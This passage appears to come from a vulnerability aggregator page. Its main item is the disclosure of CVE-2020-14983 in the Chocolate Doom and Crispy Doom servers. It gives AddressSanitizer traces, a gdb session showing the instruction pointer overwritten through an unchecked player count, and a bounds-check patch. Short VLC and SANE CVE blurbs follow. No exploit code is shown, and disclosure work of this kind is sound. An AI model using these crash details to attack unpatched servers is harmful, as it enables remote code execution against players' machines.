        #6 0x560b7e6bcf4e in D_DoomMain /home/mmm/projects/chocolate-doom-3.0.0/src/d_dedicated.c:45
        #7 0x560b7e6ba254 in main /home/mmm/projects/chocolate-doom-3.0.0/src/i_main.c:48
        #8 0x7f1b68c4fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #9 0x560b7e6ba0e9 in _start (/home/mmm/projects/chocolate-doom-3.0.0/bin-asan/bin/chocolate-server+0x60e9)
    
    Address 0x7fff357bea94 is located in stack of thread T0 at offset 132 in frame
        #0 0x560b7e6c758a in NET_SV_ParseGameStart /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:909
    
      This frame has 1 object(s):
        [32, 132) 'settings' <== Memory access at offset 132 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/mmm/projects/chocolate-doom-3.0.0/src/net_packet.c:78 in NET_ReadInt8
    Shadow bytes around the buggy address:
      0x100066aefd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd40: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00
    =>0x100066aefd50: 00 00[04]f2 f2 f2 00 00 00 00 00 00 00 00 00 00
      0x100066aefd60: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 00 00 00 00
      0x100066aefd70: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x100066aefd80: f2 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00
      0x100066aefd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==22788==ABORTING
    

Chocolate Doom without asan:

    $ bin-clean/bin/chocolate-server 
    Chocolate Doom standalone dedicated server
    zone memory: Using native C allocator.
    Warning: Failed to resolve address for master server: master.chocolate-doom.org:2342
    *** stack smashing detected ***: <unknown> terminated
    Aborted
    

Chocolate Doom without stack protection:

    $ gdb bin-clean/bin/chocolate-server 
    GNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git
    Copyright (C) 2018 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from bin-clean/bin/chocolate-server...done.
    (gdb) r
    Starting program: /home/mmm/projects/chocolate-doom-3.0.0/bin-clean/bin/chocolate-server 
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Chocolate Doom standalone dedicated server
    zone memory: Using native C allocator.
    Warning: Failed to resolve address for master server: master.chocolate-doom.org:2342
    
    Program received signal SIGSEGV, Segmentation fault.
    0x000000aa000000aa in ?? ()
    (gdb) i r
    rax            0x5555557682a0	93824994411168
    rbx            0xaa000000aa	730144440490
    rcx            0x5555557601c0	93824994378176
    rdx            0x0	0
    rsi            0xffffffff	4294967295
    rdi            0x7ffff7ff8170	140737354105200
    rbp            0xaa000000aa	0xaa000000aa
    rsp            0x7fffffffdee0	0x7fffffffdee0
    r8             0xa84	2692
    r9             0x7fffffffdd20	140737488346400
    r10            0x7fffffffdce0	140737488346336
    r11            0x246	582
    r12            0xaa000000aa	730144440490
    r13            0xaa000000aa	730144440490
    r14            0xaa000000aa	730144440490
    r15            0xaa000000aa	730144440490
    rip            0xaa000000aa	0xaa000000aa
    eflags         0x10202	[ IF RF ]
    cs             0x33	51
    ss             0x2b	43
    ds             0x0	0
    es             0x0	0
    fs             0x0	0
    gs             0x0	0
    (gdb) i stack
    #0  0x000000aa000000aa in ?? ()
    #1  0x000000aa000000aa in ?? ()
    #2  0x000000aa000000aa in ?? ()
    #3  0x000000aa000000aa in ?? ()
    #4  0x000000aa000000aa in ?? ()
    #5  0x000000aa000000aa in ?? ()
    #6  0x000000aa000000aa in ?? ()
    #7  0x000000aa000000aa in ?? ()
    #8  0x000000aa000000aa in ?? ()
    #9  0x000000aa000000aa in ?? ()
    #10 0x000000aa000000aa in ?? ()
    #11 0x000000aa000000aa in ?? ()
    #12 0x000000aa000000aa in ?? ()
    #13 0x000000aa000000aa in ?? ()
    #14 0x000000aa000000aa in ?? ()
    #15 0x000000aa000000aa in ?? ()
    #16 0x000000aa000000aa in ?? ()
    #17 0x000000aa000000aa in ?? ()
    #18 0x000000aa000000aa in ?? ()
    #19 0x000000aa000000aa in ?? ()
    #20 0x000000aa000000aa in ?? ()
    #21 0x000000aa000000aa in ?? ()
    #22 0x000000aa000000aa in ?? ()
    #23 0x000000aa000000aa in ?? ()
    #24 0x000000aa000000aa in ?? ()
    #25 0x000000aa000000aa in ?? ()
    #26 0x00007ffff4dcabb0 in __pthread_init_array () from /lib/x86_64-linux-gnu/libpthread.so.0
    #27 0x0000000000000000 in ?? ()
    

Crispy Doom ASAN

    ./chocolate-doom -iwad ~/freedm.wad -window -nomouse -connect 127.0.0.1 -nodes 1
    ./crispy-server
    

    =================================================================
    ==13660==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0a90d2d4 at pc 0x55f3703f1acc bp 0x7ffc0a90d1e0 sp 0x7ffc0a90d1d0
    WRITE of size 4 at 0x7ffc0a90d2d4 thread T0
        #0 0x55f3703f1acb in NET_ReadInt8 /home/mmm/projects/crispy-doom/src/net_packet.c:78
        #1 0x55f3703fecca in NET_ReadSettings /home/mmm/projects/crispy-doom/src/net_structrw.c:121
        #2 0x55f3703f9d11 in NET_SV_ParseGameStart /home/mmm/projects/crispy-doom/src/net_server.c:972
        #3 0x55f3703fc17b in NET_SV_Packet /home/mmm/projects/crispy-doom/src/net_server.c:1535
        #4 0x55f3703fdb8d in NET_SV_Run /home/mmm/projects/crispy-doom/src/net_server.c:1946
        #5 0x55f3703f0fd0 in NET_DedicatedServer /home/mmm/projects/crispy-doom/src/net_dedicated.c:75
        #6 0x55f3703ea30e in D_DoomMain /home/mmm/projects/crispy-doom/src/d_dedicated.c:45
        #7 0x55f3703e73a2 in main /home/mmm/projects/crispy-doom/src/i_main.c:78
        #8 0x7f1a51de3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #9 0x55f3703e6eb9 in _start (/home/mmm/projects/crispy-doom/bin-asan/bin/crispy-server+0x10eb9)
    
    Address 0x7ffc0a90d2d4 is located in stack of thread T0 at offset 132 in frame
        #0 0x55f3703f9c1b in NET_SV_ParseGameStart /home/mmm/projects/crispy-doom/src/net_server.c:956
    
      This frame has 1 object(s):
        [32, 132) 'settings' <== Memory access at offset 132 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/mmm/projects/crispy-doom/src/net_packet.c:78 in NET_ReadInt8
    Shadow bytes around the buggy address:
      0x100001519a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a40: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00
    =>0x100001519a50: 00 00 00 00 00 00 00 00 00 00[04]f2 f2 f2 00 00
      0x100001519a60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
      0x100001519a70: 04 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a80: 00 00 f1 f1 f1 f1 00 f2 f2 f2 f2 f2 f2 f2 00 f2
      0x100001519a90: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519aa0: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2 f2 f2 f8 f8
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==13660==ABORTING
    

**Fix proposition**

    diff --git a/src/net_structrw.c b/../chocolate-doom/src/net_structrw.c
    index 2dbd274..437bc71 100644
    --- a/src/net_structrw.c
    +++ b/../chocolate-doom/src/net_structrw.c
    @@ -116,7 +116,7 @@ boolean NET_ReadSettings(net_packet_t *packet, net_gamesettings_t *settings)
             return false;
         }
     
    -    for (i = 0; i < settings->num_players; ++i)
    +    for (i = 0; i < settings->num_players && i < NET_MAXPLAYERS; ++i)
         {
             if (!NET_ReadInt8(packet,
                               (unsigned int *) &settings->player_classes[i]))
    

found by Michał Dardas from LogicalTrust

CVE-2020-14983: Missing server-side num_players validation leading to buffer overflow · Issue #1293 · chocolate-doom/chocolate-doom

A heap-based buffer overflow in the hxxx_AnnexB_to_xVC function in modules/packetizer/hxxx_nal.c in VideoLAN VLC media player before 3.0.11 for macOS/iOS allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted H.264 Annex-B video (.avi for example) file.

This is the twelfth release of VLC 3.0 branch, named "Vetinari",
in reference to the Lord Patrician from Discworld.

This updates contains various fixes and improvements:
- Fixes a regression with some encrypted HLS streams
- Fixes HLS live stream playback regression
- Fixes imprecise seeking in m4a files
- Fixes resampling on Android
- Fixes a potential crash on startup on macOS
- Fixes a crash when listing blurays mount points on macOS
- Avoids unnecessary permision warnings on macOS
- Fixes AAC playback regressions

Additionanally, it fixes the security issue reported as
CVE-2020-13428, and bumps libarchive to 3.4.2 as a result of
CVE-2020-9308 & CVE-2019-19221

Check our NEWS file for more details!

Assets 2

*   2020-06-04T14:42:26Z
    
*   2020-06-04T14:42:26Z

CVE-2020-13428: Release VLC media player 3.0.11 'Vetinari' · videolan/vlc-3.0

A NULL pointer dereference in sanei_epson_net_read in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to cause a denial of service, aka GHSL-2020-075.

Tag

#buffer_overflow